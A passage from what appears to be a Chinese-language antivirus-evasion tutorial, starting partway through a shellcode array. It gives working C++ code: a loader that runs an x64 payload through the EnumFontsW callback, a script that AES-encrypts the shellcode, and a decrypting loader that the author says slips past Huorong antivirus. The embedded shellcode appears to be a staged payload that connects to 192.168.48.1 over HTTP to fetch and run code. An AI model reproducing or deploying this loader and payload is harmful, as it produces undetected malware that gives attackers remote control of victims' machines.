x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";int ShellcodeSize = sizeof(shellcode);// 使用標準 VirtualAlloc 而非 lazy_importerchar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);return 0;
}

測試，可以正常上線，說明代碼沒問題

打包出來，火絨直接秒

2、同樣，這里進行aes加密處理，先使用下面c++腳本進行加密

我這里使用了網上的加密庫：
GitHub - xf555er/ShellcodeEncryption: 對shellcode進行xor、aes加解密來繞過殺毒軟件的靜態查殺

#include <iostream>
#include "Shellcode加密庫.h"
using namespace std;int main() {unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";//生成隨機16位的key值和iv值srand(time(0)); // initialize random seedstring g_key = random_string(16);string g_iv = random_string(16);cout << "key值: " << g_key << endl;cout << "iv值: " << g_iv <<endl;//將shellcode字節數組轉換成十六進制字符串size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;string OriginalShellcode = toHexString(buf, bufLen);cout << "未加密的shellcode: " << OriginalShellcode << endl;//對shellcode字符串進行加密string EncryptShellcode = EncryptionAES(OriginalShellcode,g_key.c_str(),g_iv.c_str());cout << "加密后的shellcode: " << EncryptShellcode << endl;//對加密后的shellcode字符串進行解密string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());cout << "解密后的shellcode: " << DecryptShellcode << endl;return 0;
}

記錄加密結果

3、改造剛才的“回調函數”加載器，加入解密代碼進行改造

#define _CRT_SECURE_NO_DEPRECATE
#include <iostream>
#include <windows.h>
#include "Shellcode加密庫.h"#define BUF_SIZE 4096using namespace std;
char g_key[17] = "OeQ)ph(:u#$_Rr<2";   //填寫key密鑰
char g_iv[17] = "0(/IaOQ=>B&ETYDT";    //定義iv向量void main(int argc, char* argv[])
{// 加密后的shellcode（省略中間部分，實際中保留）string buf = "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"; // 略去過長部分// 解密shellcodestring strbuf = DecryptionAES(buf, g_key, (char*)g_iv);// 將解密的shellcode轉換為字節數組char* p = (char*)strbuf.c_str();unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));for (size_t i = 0; i < strbuf.length() / 2; i++) {sscanf(p, "%02x", &shellcode[i]);p += 2;}int ShellcodeSize = strbuf.length() / 2;printf("Decrypted buffer:\n");for (int i = 0; i < ShellcodeSize; i++) {printf("\\x%02x", shellcode[i]);}// 加載shellcodechar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);// 執行shellcodeEnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
}

測試，成功上線，代碼沒問題

打包編譯出來，火絨不再查殺，可以正常上線！

結尾

免殺效果通常受多方面影響，沒有哪一種技術或者手段能夠通吃，通常需要多種手段結合才能最終實現免殺；其次，實戰中面臨的環境也不一樣，不同的殺軟效果也不一樣，具體問題還需具體分析。本系列文章以技術的實現為主，僅拿火絨演示，以此表達一項技術的有效性。

?